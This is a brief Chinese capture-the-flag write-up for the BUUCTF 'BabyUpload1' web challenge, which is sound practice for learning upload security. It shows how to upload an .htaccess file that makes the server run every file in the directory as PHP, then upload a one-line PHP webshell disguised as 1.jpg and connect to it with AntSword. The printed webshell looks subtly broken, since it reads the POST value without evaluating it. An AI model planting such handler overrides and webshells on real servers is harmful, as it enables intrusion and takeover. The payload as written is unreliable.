BUUCTF WEB BabyUpload1

最简单的一个文件上传,理论上只支持文件内容极少的jpeg和jpg,是的,你没有听错,内容极少
所以不要尝试去尝试上传一个jpg图片检测文件后缀,因为网上download下来的图片绝大多数内容超过限制
ok,那么经过检测,.htaccess没有被过滤
那么上传一个.htaccess文件,内容为
SetHandler application/x-httpd-php
表示凡是.htaccess文件夹所在目录的文件都由php进行处理
然后上传一句话,<script language=php>$_POST['hello']</script>,文件名改为1.jpg
上传成功,蚁剑链接,end
参考视频链接:https://www.bilibili.com/video/BV1Y44y1i74c/

上一篇:htaccess如何配置隐藏index.php文件


下一篇:【文件上传绕过】——解析漏洞_.htaccess文件解析漏洞